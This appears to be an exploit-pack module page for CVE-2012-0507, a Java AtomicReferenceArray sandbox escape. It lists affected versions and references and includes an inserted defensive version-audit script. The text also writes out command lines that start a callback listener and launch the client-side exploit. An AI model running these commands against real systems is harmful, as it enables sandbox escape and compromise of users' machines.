Name | java_AtomicReferenceArray |
---|---|
CVE | CVE-2012-0507 Exploit Pack |

VENDOR: Sun
Notes:
There is a type confusion vulnerability in the java.util.concurrent.atomic.AtomicReferenceArray class.
When creating a new instance of an AtomicReferenceArray the array type has to be specified; however, the AtomicReferenceArray.set method
does not properly check the type of the object being inserted.
This vulnerability can then be used together with some reflection tricks to disable the Java Security Manager and escape the sandbox.
Affected versions:
- JDK and JRE 7 Update 2 and earlier
- JDK and JRE 6 Update 30 and earlier
- JDK and JRE 5.0 Update 33 and earlier
- SDK and JRE 1.4.2_35 and earlier
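For defenders triaging an inventory against the affected-version list above, the following is an added example, not part of the original module or its tooling. It parses `java -version` style strings and reports which hosts fall inside the listed ranges; the function names, host names and sample version lines are constructed for illustration.

```python
import re

# Last affected (micro, update) per 1.x family, taken from the list above.
LAST_AFFECTED = {7: (0, 2), 6: (0, 30), 5: (0, 33), 4: (2, 35)}

_LEGACY = re.compile(r'^1\.(\d+)\.(\d+)(?:_(\d+))?(?:-[\w.]+)?$')   # 1.6.0_30-b12
_MODERN = re.compile(r'^(\d+)(?:\.\d+)*(?:[-+][\w.+-]+)?$')         # 11.0.2, 17

def parse_java_version(text):
    """Return (family, micro, update) from a bare version or a `java -version` line."""
    quoted = re.search(r'"([^"]+)"', text)
    version = (quoted.group(1) if quoted else text).strip()
    m = _LEGACY.match(version)
    if m:
        return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    m = _MODERN.match(version)
    if m and int(m.group(1)) >= 9:          # post-1.8 numbering: 9, 11.0.2, ...
        return int(m.group(1)), 0, 0
    raise ValueError("unrecognised Java version: %r" % text)

def is_affected(text):
    """True if the version falls inside one of the affected ranges listed above."""
    family, micro, update = parse_java_version(text)
    if family < 4:
        return True     # assumption: "1.4.2_35 and earlier" read literally
    limit = LAST_AFFECTED.get(family)
    return limit is not None and (micro, update) <= limit

def audit(inventory):
    """Return the sorted host names whose reported Java version is affected."""
    return sorted(host for host, line in inventory.items() if is_affected(line))

# Constructed sample inventory (host names and version lines are made up).
SAMPLE_INVENTORY = {
    "ws-01": 'java version "1.7.0_01"',
    "ws-02": 'java version "1.6.0_29"',
    "ws-03": 'java version "1.6.0_31"',
    "ws-04": 'java version "1.7.0_03"',
    "ws-05": 'openjdk version "11.0.2" 2019-01-15',
    "ws-06": 'java version "1.4.2_35"',
}

if __name__ == "__main__":
    for host in audit(SAMPLE_INVENTORY):
        print(host, "needs a Java update:", SAMPLE_INVENTORY[host])
```

Release families that the list does not name (1.8 and the post-1.8 numbering) are reported as not affected by this check.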
Tested on:
- Windows 7 SP1 with JDK/JRE 7 and 7 update 1
- Windows 7 SP1 with JDK/JRE 6 update 29
- Windows 7 SP1 with JDK/JRE 5 update 22
- Windows XP SP3 with JDK/JRE 7 and 7 update 1
To run from the command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_AtomicReferenceArray -O allowed_recon_modules:js_recon -O auto_detect_exploits:0
Repeatability: Infinite (client side - no crash)
References:
- http://weblog.ikvm.net/CommentView.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3
- http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html
Date public: 02/14/2012